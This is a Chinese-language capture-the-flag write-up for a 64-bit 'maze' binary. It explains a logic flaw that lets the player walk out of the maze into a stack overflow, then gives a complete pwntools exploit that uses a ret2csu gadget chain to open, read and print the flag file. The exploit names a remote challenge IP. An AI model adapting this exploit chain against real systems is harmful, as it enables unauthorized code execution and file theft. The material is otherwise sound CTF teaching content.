Pwn进你的心
0%

逻辑栈溢出+csu万能pop

Posted on In 4.9k 4 mins.

maze

1
2
3
4
5
6
maze: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=4cd4e6c52445da83a37cbcb13ef31637e4b3cb87, not stripped
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
  • 64位,dynamicall,NX

漏洞分析

有不完整的后门函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
int win()
{
  __int64 buf[6]; // [rsp+0h] [rbp-40h] BYREF
  __int16 v2; // [rsp+30h] [rbp-10h]
  __int64 fd; // [rsp+38h] [rbp-8h]

  fd = open("./flag", 0);
  memset(buf, 0, sizeof(buf));
  v2 = 0;
  read(0, buf, 0LL);
  puts("HERE IS YOUR FLAG");
  return puts((const char *)buf);
}

程序大体逻辑是走迷宫,提取数据打印出来如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
@@@@@@@@@@@@@@@@
@ @@@     @@@@@@
@ @@@ @@@     @@
@ @@@  @@ @@@ @@
@ @@@@ @@ @@@ @@
@    @ @@ @@@ @@
@ @@   @@     @@
@ @@@@@@@ @@@@@@
@ @@@@@@@ @@@@@@
@ @@@@@@@   @@@@
@ @@@     @ @@9@
@ @@@ @@@@@  @ @
@  @@ @@@@@@@@ @
@@ @@     @@@@ @
@@@@@@@@@       
@@@@@@@@@@@@@@@
  • 可以发现,迷宫最后一行有一个缺口,导致程序可以“走出迷宫”从而实现栈溢出

入侵思路

走出迷宫的脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
def a():
    sla("YOURSELF!","a")
    sla("HERE(y/n)","n")

def d():
    sla("YOURSELF!","d")
    sla("HERE(y/n)","n")

def s():
    sla("YOURSELF!","s")
    sla("HERE(y/n)","n")

def w():
    sla("YOURSELF!","w")
    sla("HERE(y/n)","n")


for i in range(4):
    s()

for i in range(4):
    d()

s()
d()
d()
for i in range(3):
    w()
a()
w()
w()
for i in range(5):
    d()
for i in range(4):
    s()
for i in range(4):
    a()
for i in range(5):
    s()
for i in range(4):
    a() 
for i in range(5):
    s()
for i in range(5):
    d()
w()
w()
for i in range(5):
    d()
s()
for i in range(6):
    d()
s()

由于缺乏对 RDX 的控制,因此需要使用 csu 作为跳板

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './maze'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')
    
def debug():
    gdb.attach(p,"b* 0x400C70")
    #gdb.attach(p,"b *$rebase(0x269F)\n")
    pause()
    
def cmd(op):
    p.sendline(str(op))
    
def a():
    sla("YOURSELF!","a")
    sla("HERE(y/n)","n")

def d():
    sla("YOURSELF!","d")
    sla("HERE(y/n)","n")

def s():
    sla("YOURSELF!","s")
    sla("HERE(y/n)","n")

def w():
    sla("YOURSELF!","w")
    sla("HERE(y/n)","n")

def write(key,num):
    sla("YOURSELF!",key)
    sla("HERE(y/n)","y")
    sla("LEAVE!",str(num))
    sl("1")
    sla("YOURSELF!",key)
    sla("HERE(y/n)","y")
    sla("LEAVE!",str(0))
    sl("1")

for i in range(4):
    s()

for i in range(4):
    d()

s()
d()
d()
for i in range(3):
    w()
a()
w()
w()
for i in range(5):
    d()
for i in range(4):
    s()
for i in range(4):
    a()
for i in range(5):
    s()
for i in range(4):
    a() 
for i in range(5):
    s()
for i in range(5):
    d()
w()
w()
for i in range(5):
    d()
s()
for i in range(6):
    d()
s()
d()
d()
d()
d()
d()
d()
#debug()

pop_rdi_ret = 0x0000000000400c93
pop_rsi_pop_r15_ret = 0x0000000000400c91
ret = 0x000000000040060e
flag_addr = 0x400CE0
open = 0x400670
read = 0x602028
puts = 0x400620
bss_addr = 0x602060+0x200
magic1 = 0x400C8A
magic2 = 0x400C70

write("d",pop_rdi_ret)
write("d",flag_addr)
write("d",pop_rsi_pop_r15_ret)
write("d",0)
write("d",0)
write("d",open)
write("d",magic1)
write("d",0)
write("d",1)
write("d",read)
write("d",3)
write("d",bss_addr)
write("d",0x40)
write("d",magic2)
write("d",ret)
write("d",ret)
write("d",ret)
write("d",ret)
write("d",ret)
write("d",ret)
write("d",ret)
write("d",ret)
write("d",pop_rdi_ret)
write("d",bss_addr)
write("d",puts)

sla("YOURSELF!","s")
sla("HERE(y/n)","y")
sla("LEAVE!",str(15))
sl("1")
sla("YOURSELF!","w")
sla("HERE(y/n)","n")
sla("YOURSELF!","s")

p.interactive()